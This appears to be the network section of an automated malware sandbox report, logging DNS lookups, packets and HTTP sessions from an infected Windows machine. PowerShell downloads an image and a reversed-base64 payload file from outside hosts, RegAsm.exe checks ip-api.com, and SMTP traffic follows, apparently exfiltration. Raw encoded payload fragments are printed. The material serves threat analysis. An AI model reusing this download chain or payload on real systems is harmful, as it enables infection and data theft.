Aug 30, 2024 10:39:08.426398993 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:08.426424026 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:08.426453114 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:08.431029081 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:08.431040049 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:08.431058884 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:08.431066990 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:08.431279898 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:08.431288958 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:08.431297064 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:08.431304932 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:08.431315899 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:08.431324959 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:09.059859037 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:39:09.228518009 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:39:52.310851097 CEST	49707	80	192.168.2.8	208.95.112.1
Aug 30, 2024 10:39:52.317563057 CEST	80	49707	208.95.112.1	192.168.2.8
Aug 30, 2024 10:39:52.317647934 CEST	49707	80	192.168.2.8	208.95.112.1
Aug 30, 2024 10:40:42.326476097 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:40:42.331573009 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:40:42.502749920 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:40:42.502901077 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:40:42.503005028 CEST	587	49709	185.230.212.164	192.168.2.8
Aug 30, 2024 10:40:42.503041029 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:40:42.503346920 CEST	49709	587	192.168.2.8	185.230.212.164
Aug 30, 2024 10:40:42.503346920 CEST	49709	587	192.168.2.8	185.230.212.164

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 30, 2024 10:38:54.574846983 CEST	57050	53	192.168.2.8	1.1.1.1
Aug 30, 2024 10:38:54.724450111 CEST	53	57050	1.1.1.1	192.168.2.8
Aug 30, 2024 10:38:57.435224056 CEST	62594	53	192.168.2.8	1.1.1.1
Aug 30, 2024 10:38:57.466989040 CEST	53	62594	1.1.1.1	192.168.2.8
Aug 30, 2024 10:39:00.731539965 CEST	63204	53	192.168.2.8	1.1.1.1
Aug 30, 2024 10:39:00.738380909 CEST	53	63204	1.1.1.1	192.168.2.8
Aug 30, 2024 10:39:02.308473110 CEST	49655	53	192.168.2.8	1.1.1.1
Aug 30, 2024 10:39:02.318007946 CEST	53	49655	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 30, 2024 10:38:54.574846983 CEST	192.168.2.8	1.1.1.1	0xa886	Standard query (0)	ia601606.us.archive.org	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:38:57.435224056 CEST	192.168.2.8	1.1.1.1	0x55f5	Standard query (0)	epanpano.com	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:39:00.731539965 CEST	192.168.2.8	1.1.1.1	0x8e5d	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:39:02.308473110 CEST	192.168.2.8	1.1.1.1	0xd65b	Standard query (0)	smtp.zoho.eu	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Aug 30, 2024 10:38:54.724450111 CEST	1.1.1.1	192.168.2.8	0xa886	No error (0)	ia601606.us.archive.org	207.241.227.86	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:38:57.466989040 CEST	1.1.1.1	192.168.2.8	0x55f5	No error (0)	epanpano.com	78.142.208.13	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:39:00.738380909 CEST	1.1.1.1	192.168.2.8	0x8e5d	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Aug 30, 2024 10:39:02.318007946 CEST	1.1.1.1	192.168.2.8	0xd65b	No error (0)	smtp.zoho.eu	185.230.212.164	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ia601606.us.archive.org

epanpano.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49707	208.95.112.1	80	7944	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 30, 2024 10:39:00.750458002 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Aug 30, 2024 10:39:01.207411051 CEST	175	IN	HTTP/1.1 200 OK Date: Fri, 30 Aug 2024 08:39:01 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49705	207.241.227.86	443	7728	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-30 08:38:55 UTC	112	OUT	GET /10/items/deathnote_202407/deathnote.jpg HTTP/1.1 Host: ia601606.us.archive.org Connection: Keep-Alive
2024-08-30 08:38:55 UTC	582	IN	HTTP/1.1 200 OK Server: nginx/1.25.1 Date: Fri, 30 Aug 2024 08:38:55 GMT Content-Type: image/jpeg Content-Length: 1931225 Last-Modified: Fri, 26 Jul 2024 22:09:28 GMT Connection: close ETag: "66a41e98-1d77d9" Strict-Transport-Security: max-age=15724800 Expires: Fri, 30 Aug 2024 14:38:55 GMT Cache-Control: max-age=21600 Access-Control-Allow-Origin: * Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With Access-Control-Allow-Credentials: true Accept-Ranges: bytes
2024-08-30 08:38:55 UTC	15802	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-08-30 08:38:55 UTC	16384	IN	Data Raw: 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b 33 82 a5 18 b5 55 83 ec 7d Data Ascii: G"82xv,sa pU?1^)ki[prMGbXT^IlSeFQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e3U}
2024-08-30 08:38:55 UTC	16384	IN	Data Raw: a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a 8d 7c a9 a3 d3 1d 8e 66 9c Data Ascii: ;e'/du%opW+!k'G\|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@XMUaVEy~x%K:]I[&FDW:dvy\|f
2024-08-30 08:38:55 UTC	16384	IN	Data Raw: 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca 08 5d b8 61 7c 63 e9 e4 28 Data Ascii: )!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6]a\|c(
2024-08-30 08:38:55 UTC	16384	IN	Data Raw: ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1 90 a2 ac 2e ae 15 68 10 4d Data Ascii: G8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui.hM
2024-08-30 08:38:55 UTC	16384	IN	Data Raw: dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d aa 8a 58 92 43 15 24 76 1f Data Ascii: q( k`2vQ$(^2`D_)PRH?<]`GJ\|"(oW$GSW<D}#8{[k$@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR< tU"Ye6EV\|z,y<=]XC$v
2024-08-30 08:38:55 UTC	16384	IN	Data Raw: 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28 56 0e a7 72 f1 47 eb d7 8c Data Ascii: 62upG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH}XMO(VrG
2024-08-30 08:38:55 UTC	16384	IN	Data Raw: 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93 ea b0 09 e3 25 27 75 72 43 Data Ascii: <U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G\|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h\|b@?_{%iJ_$U`L\|%'urC
2024-08-30 08:38:55 UTC	16384	IN	Data Raw: 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad 53 23 6a da 35 44 24 ed 6d Data Ascii: e`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pWS#j5D$m
2024-08-30 08:38:55 UTC	16384	IN	Data Raw: e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a 7e 7e f8 19 92 e9 55 d6 49 Data Ascii: is"ydPTg_4wA\|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytxn\|6^xq]$nSx6(H1VFRd$z~~UI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49706	78.142.208.13	443	7728	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-30 08:38:58 UTC	74	OUT	GET /log/ORGN.txt HTTP/1.1 Host: epanpano.com Connection: Keep-Alive
2024-08-30 08:38:58 UTC	193	IN	HTTP/1.1 200 OK Connection: close content-type: text/plain last-modified: Thu, 29 Aug 2024 13:54:35 GMT accept-ranges: bytes content-length: 334508 date: Fri, 30 Aug 2024 08:38:59 GMT
2024-08-30 08:38:59 UTC	16384	IN	Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-08-30 08:38:59 UTC	16384	IN	Data Raw: 54 46 48 41 41 30 48 41 59 42 67 4f 41 41 44 41 37 42 41 65 41 41 44 41 67 41 67 4f 41 51 45 41 4a 64 42 41 41 6b 43 41 39 42 41 4d 41 73 48 41 6f 41 41 49 41 6b 44 41 67 41 67 62 41 45 47 41 6f 42 41 64 41 41 43 41 7a 42 77 63 41 55 47 41 73 42 41 49 41 4d 48 41 70 42 41 49 41 55 47 41 74 42 51 59 41 34 45 41 6e 42 67 62 41 6b 47 41 79 42 41 64 41 4d 46 41 67 41 51 5a 41 67 47 41 30 42 41 49 41 59 47 41 76 42 41 49 41 55 47 41 36 42 51 61 41 4d 31 56 41 41 51 4b 41 30 48 41 78 41 77 65 41 67 43 41 67 41 51 66 41 41 44 41 37 42 41 49 41 38 47 41 30 42 41 49 41 77 47 41 68 42 51 64 41 45 48 41 6c 42 41 49 41 51 48 41 76 42 67 62 41 41 43 41 7a 42 51 61 41 41 43 41 6c 42 67 65 41 6b 47 41 54 42 51 5a 41 30 47 41 68 42 67 54 41 41 43 41 6c 42 41 61 41 51 48 Data Ascii: TFHAA0HAYBgOAADA7BAeAADAgAgOAQEAJdBAAkCA9BAMAsHAoAAIAkDAgAgbAEGAoBAdAACAzBwcAUGAsBAIAMHApBAIAUGAtBQYA4EAnBgbAkGAyBAdAMFAgAQZAgGA0BAIAYGAvBAIAUGA6BQaAM1VAAQKA0HAxAweAgCAgAQfAADA7BAIA8GA0BAIAwGAhBQdAEHAlBAIAQHAvBgbAACAzBQaAACAlBgeAkGATBQZA0GAhBgTAACAlBAaAQH
2024-08-30 08:38:59 UTC	16384	IN	Data Raw: 54 42 41 62 41 45 47 41 31 42 41 64 41 49 48 41 70 42 67 56 41 77 31 64 41 41 41 64 41 67 48 41 30 42 67 4c 41 51 48 41 7a 42 51 61 41 77 47 41 77 42 41 64 41 59 45 41 63 42 51 5a 41 67 48 41 31 42 41 62 41 55 47 41 45 42 41 49 41 49 48 41 6c 42 41 5a 41 34 47 41 68 42 51 62 41 30 47 41 76 42 77 51 41 41 43 41 51 42 41 56 41 59 45 41 63 42 51 4b 41 59 44 41 34 41 41 65 41 67 43 41 67 41 77 63 41 55 47 41 73 42 51 61 41 59 45 41 67 41 51 62 41 45 47 41 79 42 77 5a 41 38 47 41 79 42 41 55 41 77 46 41 6c 42 67 63 41 38 47 41 30 42 77 55 41 77 47 41 68 42 51 64 41 51 48 41 79 42 51 61 41 59 46 41 63 56 49 67 41 41 51 50 41 51 47 41 79 42 77 62 41 63 48 41 7a 42 77 63 41 45 47 41 51 42 77 4f 56 41 41 41 30 42 41 65 41 51 48 41 75 41 41 64 41 4d 48 41 70 42 41 Data Ascii: TBAbAEGA1BAdAIHApBgVAw1dAAAdAgHA0BgLAQHAzBQaAwGAwBAdAYEAcBQZAgHA1BAbAUGAEBAIAIHAlBAZA4GAhBQbA0GAvBwQAACAQBAVAYEAcBQKAYDA4AAeAgCAgAwcAUGAsBQaAYEAgAQbAEGAyBwZA8GAyBAUAwFAlBgcA8GA0BwUAwGAhBQdAQHAyBQaAYFAcVIgAAQPAQGAyBwbAcHAzBwcAEGAQBwOVAAA0BAeAQHAuAAdAMHApBA
2024-08-30 08:38:59 UTC	16384	IN	Data Raw: 31 46 58 52 41 4d 48 62 68 6c 47 64 75 56 47 5a 6c 4a 33 51 30 78 57 64 68 5a 57 5a 45 56 32 63 56 39 46 64 6c 4e 48 41 7a 78 57 59 70 52 6e 62 6c 52 57 5a 79 4e 45 64 73 56 58 59 6d 56 47 52 66 52 58 5a 6e 42 77 63 73 46 57 61 30 35 57 5a 6b 56 6d 63 44 39 46 64 6c 4e 48 41 7a 78 57 59 70 52 6e 62 6c 52 57 5a 79 4e 55 53 41 4d 33 61 7a 46 47 56 66 52 58 5a 7a 42 77 63 72 4e 58 59 55 39 46 64 6c 64 47 41 7a 74 32 59 70 52 31 58 30 56 32 5a 41 4d 33 5a 79 46 45 64 75 56 6d 64 46 52 57 5a 7a 42 58 59 73 56 45 41 7a 64 57 59 73 5a 47 41 7a 64 57 59 73 5a 30 64 6b 42 77 63 6e 46 47 62 47 31 57 5a 30 4e 58 65 54 56 47 62 70 5a 47 41 7a 56 6d 64 70 4a 48 52 73 46 32 59 70 64 32 62 4d 52 58 5a 48 42 77 63 6c 56 48 62 68 5a 31 58 30 56 32 5a 41 4d 58 5a 30 6c 6e Data Ascii: 1FXRAMHbhlGduVGZlJ3Q0xWdhZWZEV2cV9FdlNHAzxWYpRnblRWZyNEdsVXYmVGRfRXZnBwcsFWa05WZkVmcD9FdlNHAzxWYpRnblRWZyNUSAM3azFGVfRXZzBwcrNXYU9FdldGAzt2YpR1X0V2ZAM3ZyFEduVmdFRWZzBXYsVEAzdWYsZGAzdWYsZ0dkBwcnFGbG1WZ0NXeTVGbpZGAzVmdpJHRsF2Ypd2bMRXZHBwclVHbhZ1X0V2ZAMXZ0ln
2024-08-30 08:38:59 UTC	16384	IN	Data Raw: 41 45 47 5a 73 42 51 59 51 5a 33 52 6d 74 45 57 41 45 57 54 72 52 54 4f 34 78 47 41 68 78 30 52 42 5a 7a 52 70 64 7a 53 43 42 51 59 47 5a 58 52 48 5a 45 57 33 42 51 59 42 5a 46 41 68 56 44 57 61 46 45 41 68 52 7a 56 41 45 32 4d 59 70 46 41 66 39 56 5a 31 78 57 59 32 42 67 57 70 74 47 41 61 64 57 64 33 63 44 61 32 42 67 57 6e 6c 46 62 41 6f 31 59 44 74 32 53 41 6f 56 59 32 77 47 64 36 74 47 65 49 42 67 57 59 6c 57 55 54 4e 30 5a 78 41 54 65 76 42 67 57 54 42 56 65 41 6f 46 52 58 56 45 4d 52 4a 31 62 35 55 44 41 61 4e 54 61 31 42 51 57 35 56 6c 53 4e 68 58 54 57 42 51 57 32 46 31 54 4c 68 58 55 51 64 54 55 41 6b 56 61 30 4a 46 41 5a 52 46 55 4e 56 30 58 55 5a 46 41 5a 42 31 63 41 6b 46 53 6f 5a 58 65 70 42 51 57 47 64 6d 64 41 6b 46 52 68 4a 57 65 4c 42 51 Data Ascii: 